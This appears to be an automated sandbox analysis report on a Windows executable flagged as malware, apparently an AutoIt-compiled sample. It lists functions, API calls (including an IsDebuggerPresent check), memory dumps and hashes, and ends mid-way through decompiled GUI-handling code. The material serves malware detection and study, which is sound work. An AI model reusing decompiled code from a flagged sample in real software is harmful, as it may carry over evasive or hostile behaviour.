Function 004034C1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004734AA

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: >>>AUTOIT NO CMDEXECUTE<<<
API String ID: 1029625771-2684727018
Opcode ID: f7179516d086799e861ee80e7754a7fe10f50603c8cf396cf9f5d74ef0bca366
Instruction ID: 1913f21859498a4f8ea7eefccb92df7ec00397a73ce7fc91d897cb1aec99f227
Opcode Fuzzy Hash: f7179516d086799e861ee80e7754a7fe10f50603c8cf396cf9f5d74ef0bca366
Instruction Fuzzy Hash: 37F0447190020DAADF15EEB1D8919FFBB7CAA10315B10853BA815A2182EB7C9B09DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00403682, Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

73C54310.UXTHEME ref: 004036E6

Part of subcall function 00422025: __lock.LIBCMT ref: 0042202B

Part of subcall function 004032DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004032F6
Part of subcall function 004032DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040330B

Part of subcall function 0040374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0040376D
Part of subcall function 0040374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0040377F
Part of subcall function 0040374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe,00000104,?,004C1120,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe,004C1124,?,?), ref: 004037EE
Part of subcall function 0040374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00403860

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403726

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoParametersSystem$CurrentDirectory$C54310DebuggerFullNamePathPresent__lock
String ID:
API String ID: 658510183-0
Opcode ID: 476cc59a8142050b6cdbf6784287488b951090b9ec20b5539e892d730582c081
Instruction ID: ac602964e06855ac60757aaf3c3ebe27a6febd0f516daba1bf0a50dddfc9e845
Opcode Fuzzy Hash: 476cc59a8142050b6cdbf6784287488b951090b9ec20b5539e892d730582c081
Instruction Fuzzy Hash: 8A118E719083419BC300DF26DA45D5ABFE9FF85714F00492FF844872B2DBB89984CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042F782, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0042F7D9
__close_nolock.LIBCMT ref: 0042F7F2

Part of subcall function 0042886A: __getptd_noexit.LIBCMT ref: 0042886A

Part of subcall function 0042889E: __getptd_noexit.LIBCMT ref: 0042889E

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 4473a41aae1b4b195ae706b294230b2cd714a72c59073ed4ab6c85bbb1354455
Instruction ID: 12082feb5fc8a35a692e6f4d6b9bd041187186bb8a4553055a6d55dd4c5bd462
Opcode Fuzzy Hash: 4473a41aae1b4b195ae706b294230b2cd714a72c59073ed4ab6c85bbb1354455
Instruction Fuzzy Hash: F411E332B066308EC7017FA5B84134DB6705F41338FD5027AE4201B2E2CBBC590086AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040318A, Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 004031AE
EnumResourceNamesW.KERNEL32(00000000,0000000E,00447212,00000063,00000000,74ED1C00,?,?,00403118,?,?,000000FF), ref: 00474AFE

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: EnumImageLoadNamesResource
String ID:
API String ID: 1578290342-0
Opcode ID: 298f84f2b67d4a0b28e00351f78f8800d72fc8977272d44972864604c970a108
Instruction ID: c8bfac3f0f04345e96a32cb018da4b1e6ff5fc72c793ff5e2fc5f5a052d9ab50
Opcode Fuzzy Hash: 298f84f2b67d4a0b28e00351f78f8800d72fc8977272d44972864604c970a108
Instruction Fuzzy Hash: 52F062716403107AE2204B16AC46F963B98E74ABB1F104526F214AA1E1D3F495908B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00424274, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0042889E: __getptd_noexit.LIBCMT ref: 0042889E

__lock_file.LIBCMT ref: 004242B9

Part of subcall function 00425A9F: __lock.LIBCMT ref: 00425AC2

__fclose_nolock.LIBCMT ref: 004242C4

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: bee3c605da2835603644a55b58059ed8fd4951f325d625e310bbece28e17a230
Instruction ID: db2b3d86ee306a5c7206d09d440f825ee7983ab47d408acf3bd330c66266eab8
Opcode Fuzzy Hash: bee3c605da2835603644a55b58059ed8fd4951f325d625e310bbece28e17a230
Instruction Fuzzy Hash: F8F09631B01634DAD7106B77A80275E67D09F80378FA1428FB8149B1C1CB7C99019B6D

Uniqueness

Uniqueness Score: -1.00%

Function 05160AB5, Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000,00036000,00036000,00036000), ref: 05160C98

Memory Dump Source

Source File: 00000001.00000002.261826032.0000000005160000.00000040.00000001.sdmp, Offset: 05160000, based on PE: false

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ca2d3385cc6790776d395f30a60e720a3344b95dae3c22287662108855da11c4
Instruction ID: 299bf1335525a44f5be6762fab51b238de1ba7f6632efa4c83bd90941cb8fa74
Opcode Fuzzy Hash: ca2d3385cc6790776d395f30a60e720a3344b95dae3c22287662108855da11c4
Instruction Fuzzy Hash: AD51AA19E54388A9DB60CBE8F851BBDA3B1AF48B10F20541BE50CEF2E0E3750D95D709

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6D0, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0040B7C2

Part of subcall function 0042010A: _malloc.LIBCMT ref: 00420122

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: e85b4e5e48b803414d1e965ad60749aaaa9c08348be1f3036355104e4980f3b1
Instruction ID: c03100ae1a747c2fce84a686b45d9a35bd4735efad2e1e0b1dfbb123e578a3ba
Opcode Fuzzy Hash: e85b4e5e48b803414d1e965ad60749aaaa9c08348be1f3036355104e4980f3b1
Instruction Fuzzy Hash: 63418C792006028FC3249F1AD481962F7E1FF89361714C43FE99A8B791D735E852CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9B, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00403F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00403F90

Part of subcall function 00424129: __wfsopen.LIBCMT ref: 00424134

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004034E2,?,00000001), ref: 00403FCD

Part of subcall function 00403E78: FreeLibrary.KERNEL32(00000000), ref: 00403EAB

Part of subcall function 00404010: _memmove.LIBCMT ref: 0040405A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 79a488a458cc78bb51500820686e0c401109b776b895e723bdeb9da980de3804
Instruction ID: fdf8873622c313c8e43fb043dbbc1d4e638544a30206d94adcc50d2ba4e284ec
Opcode Fuzzy Hash: 79a488a458cc78bb51500820686e0c401109b776b895e723bdeb9da980de3804
Instruction Fuzzy Hash: ED11E731600215ABCB10BF65DC07F9E77A99F90709F10883FF645FA1C1DBB89A019B99

Uniqueness

Uniqueness Score: -1.00%

Function 00403E39, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,004034E2,?,00000001), ref: 00403E6D

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d61aeb98998b914a157a0a3d7b06593935becec7f21665a085ba8769b5497a50
Instruction ID: a3e33d0dbf2cb6a97da07227813fa318d9df823705834b84f16efa7d7fc631b6
Opcode Fuzzy Hash: d61aeb98998b914a157a0a3d7b06593935becec7f21665a085ba8769b5497a50
Instruction Fuzzy Hash: 2FF0A970501301CFCB34AF25D890813BBE8EF0471A3208E7FE1C6A26A1C7399944DF88

Uniqueness

Uniqueness Score: -1.00%

Function 00424129, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00424134

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 3bc12a26e3ba6014c5ca8a88bde1eff7e0558a5af9717e53d19726fab8a4f906
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: F8B0927254031C77CE012A82EC02A597F199B90764F408021FB0C18161A677AAB09A89

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0046F5D0, Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630
windowkeyboardnativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E0046F5D0(struct HWND__* _a4, signed int _a8, struct HWND__** _a12) {
				intOrPtr _v24;
				long _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v84;
				long _v92;
				void* _v96;
				signed int _v108;
				int _v112;
				void* _v116;
				struct HWND__** _v120;
				intOrPtr _v124;
				long _v128;
				signed int _v132;
				int _v136;
				void* _v140;
				char _v144;
				signed int _v148;
				struct tagPOINT _v156;
				signed int _v157;
				struct tagPOINT _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _v204;
				void* __ebx;
				signed int _t204;
				long _t206;
				signed int _t207;
				void* _t208;
				intOrPtr _t210;
				signed int _t212;
				signed int _t216;
				intOrPtr _t217;
				signed int _t220;
				struct HWND__* _t223;
				struct HWND__* _t226;
				intOrPtr _t228;
				intOrPtr _t235;
				intOrPtr _t238;
				signed int _t242;
				intOrPtr _t245;
				signed int _t255;
				intOrPtr _t256;
				intOrPtr _t258;
				long _t262;
				intOrPtr _t265;
				signed int _t271;
				signed int _t274;
				intOrPtr _t275;
				signed int _t277;
				signed int _t285;
				intOrPtr _t288;
				signed int _t292;
				long _t300;
				signed int _t322;
				intOrPtr _t323;
				intOrPtr _t328;
				intOrPtr _t333;
				signed int _t338;
				signed int _t340;
				short _t342;
				short _t343;
				short _t345;
				signed int _t347;
				signed int _t354;
				long _t355;
				signed int _t362;
				int _t369;
				intOrPtr _t375;
				intOrPtr _t378;
				intOrPtr _t379;
				intOrPtr _t381;
				struct HMENU__* _t384;
				struct HMENU__* _t386;
				intOrPtr _t391;
				signed int _t403;
				intOrPtr _t404;
				intOrPtr _t405;
				struct HWND__** _t407;
				intOrPtr _t410;
				signed int _t412;
				signed int _t414;
				struct tagPOINT* _t419;
				struct HWND__* _t420;
				long _t422;
				signed int _t423;
				intOrPtr _t424;
				struct HWND__* _t425;
				void* _t430;
				void* _t431;

				_t204 = E0041AF7D(0x4c1810, _a4);
				_t375 =  *0x4c1870; // 0x0
				_t407 = _a12;
				_v148 = _t204;
				_t410 =  *((intOrPtr*)( *((intOrPtr*)(_t375 + _t204 * 4))));
				_t206 = _t407[2];
				_v124 = _t410;
				_t430 = _t206 - 0xfffffe6e;
				if(_t430 > 0) {
					__eflags = _t206 - 0xfffffff0;
					if(__eflags > 0) {
						__eflags = _t206 - 0xfffffff4;
						if(_t206 == 0xfffffff4) {
							_t207 = E0041B155(0x4c1810,  *_t407);
							_v168 = _t207;
							__eflags = _t207 - 0xffffffff;
							if(_t207 == 0xffffffff) {
								L8:
								_t208 =  *0x48d560(_a4, 0x4e, _a8, _t407);
								L9:
								return _t208;
							}
							_t378 =  *0x4c1884; // 0xb6e518
							_t379 =  *((intOrPtr*)( *((intOrPtr*)(_t378 + _t207 * 4))));
							_t175 = _t379 + 0x90; // 0x64
							_t210 =  *_t175;
							__eflags = _t210 - 0x10;
							if(_t210 == 0x10) {
								L100:
								_t212 = _t407[3] - 1;
								__eflags = _t212;
								if(_t212 == 0) {
									_t208 = 0x20;
									goto L9;
								}
								__eflags = _t212 != 0x10000;
								if(_t212 != 0x10000) {
									goto L8;
								}
								_t362 = 0;
								__eflags =  *((intOrPtr*)(_t379 + 0x48)) - 0xfe000000;
								if( *((intOrPtr*)(_t379 + 0x48)) == 0xfe000000) {
									_t362 = 1;
									__eflags = 1;
								}
								_t216 = E0040CF2C(0x4c1810, _t407[0xb],  &_v144,  &_v164);
								__eflags = _t216;
								if(_t216 != 0) {
									_t217 =  *0x4c1884; // 0xb6e518
									_t412 = _v164.x;
									_t220 = GetWindowLongW( *( *((intOrPtr*)( *((intOrPtr*)(_t217 + _t412 * 4)))) + 0x34), 0xfffffff0);
									__eflags = _t220 & 0x08000000;
									if((_t220 & 0x08000000) != 0) {
										goto L105;
									}
									__eflags = _t407[0xa] & 0x00000011;
									_t381 =  *0x4c1884; // 0xb6e518
									if((_t407[0xa] & 0x00000011) == 0) {
										L109:
										_t223 =  *( *((intOrPtr*)( *((intOrPtr*)(_t381 + _t412 * 4)))) + 0x4c);
										__eflags = _t223 - 0xffffffff;
										if(_t223 != 0xffffffff) {
											_t407[0xc] = _t223;
											_t381 =  *0x4c1884; // 0xb6e518
										}
										_t226 =  *( *((intOrPtr*)( *((intOrPtr*)(_t381 + _t412 * 4)))) + 0x48);
										__eflags = _t226;
										if(_t226 < 0) {
											goto L105;
										} else {
											__eflags = _t362;
											if(_t362 == 0) {
												L114:
												_t407[0xd] = _t226;
												goto L105;
											}
											__eflags = _t407[9] & 0x00000001;
											if((_t407[9] & 0x00000001) == 0) {
												goto L105;
											}
											goto L114;
										}
									}
									_t228 =  *((intOrPtr*)( *((intOrPtr*)(_t381 + _t412 * 4))));
									__eflags =  *((char*)(_t228 + 0x90)) - 0x14;
									if( *((char*)(_t228 + 0x90)) != 0x14) {
										goto L8;
									}
									goto L109;
								} else {
									L105:
									_t208 = 0;
									goto L9;
								}
							}
							__eflags = _t210 - 0x13;
							if(_t210 != 0x13) {
								goto L8;
							}
							goto L100;
						}
						__eflags = _t206 - 0xfffffffb;
						if(_t206 == 0xfffffffb) {
							_v157 = 0;
							E0041B736(0x4c1810, _t410, 1);
							GetCursorPos( &_v164);
							ScreenToClient( *_t407,  &_v164);
							_t414 = E0041B155(0x4c1810,  *_t407);
							_v176 = _t414;
							__eflags = _t414 - 0xffffffff;
							if(_t414 != 0xffffffff) {
								L78:
								_t235 =  *0x4c1884; // 0xb6e518
								_v148 = _t414;
								_t238 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t235 + _t414 * 4)))) + 0x90));
								__eflags = _t238 - 0x10;
								if(_t238 == 0x10) {
									_v140 = _v156.x;
									_v136 = _v156.y;
									_t242 = SendMessageW( *_t407, 0x1111, 0,  &_v140);
									__eflags = _t242;
									if(_t242 == 0) {
										L95:
										ClientToScreen( *_t407,  &_v156);
										_t245 =  *0x4c1884; // 0xb6e518
										_t384 =  *( *((intOrPtr*)( *((intOrPtr*)(_t245 + _t414 * 4)))) + 0xc);
										__eflags = _t384;
										if(_t384 == 0) {
											goto L8;
										}
										TrackPopupMenuEx(_t384, 0x80, _v156.x, _v156.y,  *_v120, 0);
										L36:
										_t208 = 1;
										goto L9;
									}
									_v92 = _t242;
									_v96 = 4;
									SendMessageW( *_t407, 0x113e, 0,  &_v96);
									__eflags = _v132 & 0x00000046;
									if((_v132 & 0x00000046) == 0) {
										goto L95;
									}
									_t255 = E0040CF2C(0x4c1810, _v60,  &_v144,  &_v164);
									__eflags = _t255;
									if(_t255 == 0) {
										L94:
										_t414 = _v148;
										goto L95;
									}
									_t414 = _v164.x;
									_t256 =  *0x4c1884; // 0xb6e518
									_t258 =  *((intOrPtr*)( *((intOrPtr*)(_t256 + _t414 * 4))));
									__eflags =  *(_t258 + 0xc);
									if( *(_t258 + 0xc) != 0) {
										goto L95;
									}
									goto L94;
								}
								__eflags = _t238 - 0x13;
								if(_t238 != 0x13) {
									goto L8;
								}
								_v116 = _v156.x;
								_v112 = _v156.y;
								_t262 = SendMessageW( *_t407, 0x1012, 0,  &_v116);
								__eflags = _t262 - 0xffffffff;
								if(_t262 <= 0xffffffff) {
									L88:
									ClientToScreen( *_t407,  &_v156);
									_t265 =  *0x4c1884; // 0xb6e518
									_t386 =  *( *((intOrPtr*)( *((intOrPtr*)(_t265 + _t414 * 4)))) + 0xc);
									__eflags = _t386;
									if(_t386 != 0) {
										TrackPopupMenuEx(_t386, 0, _v156.x, _v156.y,  *_v120, 0);
									}
									goto L8;
								}
								__eflags = _v157;
								if(_v157 != 0) {
									goto L88;
								}
								_v52 = _t262;
								_v56 = 4;
								_t271 = SendMessageW( *_t407, 0x104b, 0,  &_v56);
								__eflags = _t271;
								if(_t271 == 0) {
									goto L8;
								}
								__eflags = _v108 & 0x0000000e;
								if((_v108 & 0x0000000e) == 0) {
									goto L88;
								}
								_t274 = E0040CF2C(0x4c1810, _v24,  &_v144,  &_v164);
								__eflags = _t274;
								if(_t274 == 0) {
									L87:
									_t414 = _v148;
									goto L88;
								}
								_t414 = _v164.x;
								_t275 =  *0x4c1884; // 0xb6e518
								_t277 =  *( *(_t275 + _t414 * 4));
								__eflags = _t277;
								if(_t277 == 0) {
									goto L87;
								}
								__eflags =  *(_t277 + 0xc);
								if( *(_t277 + 0xc) != 0) {
									goto L88;
								}
								goto L87;
							}
							_t414 = E0041B155(0x4c1810, GetParent( *_t407));
							_v168 = _t414;
							__eflags = _t414 - 0xffffffff;
							if(_t414 == 0xffffffff) {
								goto L8;
							}
							_v157 = 1;
							goto L78;
						}
						__eflags = _t206 - 0xfffffffe;
						if(_t206 != 0xfffffffe) {
							goto L8;
						}
						E0041B736(0x4c1810, _t410, 1);
						GetCursorPos( &_v164);
						ScreenToClient( *_t407,  &_v164);
						_t285 = E0041B155(0x4c1810,  *_t407);
						__eflags = _t285 - 0xffffffff;
						if(_t285 == 0xffffffff) {
							goto L8;
						}
						_t391 =  *0x4c1884; // 0xb6e518
						_t288 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t391 + _t285 * 4)))) + 0x90));
						__eflags = _t288 - 0x10;
						if(_t288 < 0x10) {
							goto L8;
						}
						__eflags = _t288 - 0x11;
						if(_t288 <= 0x11) {
							_v140 = _v156.x;
							_v136 = _v156.y;
							_t292 = SendMessageW( *_t407, 0x1111, 0,  &_v140);
							__eflags = _t292;
							if(_t292 != 0) {
								_v92 = _t292;
								_v96 = 0xc;
								_v84 = 0xf000;
								SendMessageW( *_t407, 0x113e, 0,  &_v96);
								__eflags = _v132 & 0x00000046;
								if((_v132 & 0x00000046) != 0) {
									SendMessageW( *_t407, 0x110b, 9, 0);
									SendMessageW( *_t407, 0x110b, 9, _v128);
								}
							}
							goto L8;
						}
						__eflags = _t288 - 0x13;
						if(_t288 != 0x13) {
							goto L8;
						}
						_v116 = _v156;
						_v112 = _v156.y;
						_t300 = SendMessageW( *_t407, 0x1012, 0,  &_v116);
						__eflags = _t300 - 0xffffffff;
						if(_t300 == 0xffffffff) {
							goto L8;
						}
						_v52 = _t300;
						_v56 = 4;
						SendMessageW( *_t407, 0x104b, 0,  &_v56);
						__eflags = _v108 & 0x0000000e;
						if((_v108 & 0x0000000e) == 0) {
							goto L8;
						}
						_push(0);
						_push(_v24);
						L44:
						E0046DE72();
						goto L8;
					}
					if(__eflags == 0) {
						ReleaseCapture();
						goto L8;
					}
					__eflags = _t206 - 0xfffffec0;
					if(_t206 == 0xfffffec0) {
						L60:
						InvalidateRect( *_t407, 0, 1);
						goto L8;
					}
					__eflags = _t206 - 0xfffffed4;
					if(_t206 == 0xfffffed4) {
						goto L60;
					}
					__eflags = _t206 - 0xffffff93;
					if(_t206 == 0xffffff93) {
						 *0x48d090( *0x4c18bc, 0, 0, 0);
						 *0x48d094( *0x4c18bc, 0, 0xfffffff8, 0xfffffff0);
						SetCapture(_a4);
						 *0x4c18c0 = _a8;
						_v172 = 0;
						_v164.x = 0;
						_v164.y = 1;
						E00412570( &_v172);
						_v164.y = 1;
						_v172 = _a8;
						E0040CAEE(0,  &_v148, __eflags, L"@GUI_DRAGID");
						E0040D380( &(_v156.y),  &_v176, 1, 2);
						E00405CD3( &_v168);
						_t419 =  &(_t407[8]);
						ClientToScreen( *_t407, _t419);
						 *0x48d098(0, _t419->x, _t407[9]);
						E00412570( &_v204);
					} else {
						__eflags = _t206 - 0xffffff94;
						if(_t206 == 0xffffff94) {
							_t420 = _t407[1];
							_t322 = E0040CF2C(0x4c1810, _t420,  &_v144,  &_v164);
							__eflags = _t322;
							if(_t322 != 0) {
								_t323 =  *0x4c1884; // 0xb6e518
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + _v164.x * 4)))) + 0x96)) = _t407[4];
								E0046DE72(_t407[1], 0);
								_t404 =  *0x4c1884; // 0xb6e518
								_t399 = _v172;
								_t328 =  *((intOrPtr*)( *((intOrPtr*)(_t404 + _v172 * 4))));
								__eflags =  *(_t328 + 0x28);
								if( *(_t328 + 0x28) > 0) {
									 *0x4c184c = _t420;
									E0040C935(0x4c1850,  *((intOrPtr*)( *((intOrPtr*)(_t404 + _t399 * 4)))) + 0x24);
									_t333 =  *0x4c1884; // 0xb6e518
									 *0x4c1860 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + _v168 * 4)))) + 0x98));
									SendMessageW( *_t407, 0x1030, _t407[4], 0x46de69);
								}
							}
						}
					}
					goto L8;
				}
				if(_t430 == 0) {
					L45:
					_t369 = 0;
					_t338 = SendMessageW( *_t407, 0x110a, 9, 0);
					__eflags = _t338;
					if(_t338 == 0) {
						goto L8;
					}
					_v92 = _t338;
					_v96 = 4;
					_t340 = SendMessageW( *_t407, 0x113e, 0,  &_v96);
					__eflags = _t340;
					if(_t340 == 0) {
						goto L8;
					}
					__eflags = _t407[0xd] - _t407[0x17];
					if(_t407[0xd] == _t407[0x17]) {
						goto L8;
					}
					__eflags = _t407[3] - 0x1000;
					if(_t407[3] == 0x1000) {
						goto L8;
					}
					__eflags = _t407[3] - 1;
					L26:
					if(__eflags == 0) {
						goto L8;
					}
					_push(_t369);
					_push(_v60);
					goto L44;
				}
				_t431 = _t206 - 0xfffffdd9;
				if(_t431 > 0) {
					__eflags = _t206 - 0xfffffdda;
					if(_t206 == 0xfffffdda) {
						_t342 = GetKeyState(0x11);
						__eflags = _t342;
						if(_t342 >= 0) {
							goto L8;
						}
						_t343 = GetKeyState(9);
						__eflags = _t343;
						if(_t343 >= 0) {
							goto L8;
						}
						_t422 = SendMessageW( *_t407, 0x130b, 0, 0);
						_t345 = GetKeyState(0x10);
						__eflags = _t345;
						if(_t345 >= 0) {
							_t423 = _t422 + 1;
							__eflags = _t423;
						} else {
							_t423 = _t422 - 1;
						}
						_push(_t423);
						L43:
						_push(_t407[1]);
						goto L44;
					}
					__eflags = _t206 - 0xfffffdee;
					if(_t206 == 0xfffffdee) {
						__eflags =  *(_t410 + 0x188);
						if( *(_t410 + 0x188) == 0) {
							goto L8;
						}
						_t405 =  *0x4c1894; // 0x2
						_t403 = 3;
						__eflags = _t405 - 0xfffffdd9;
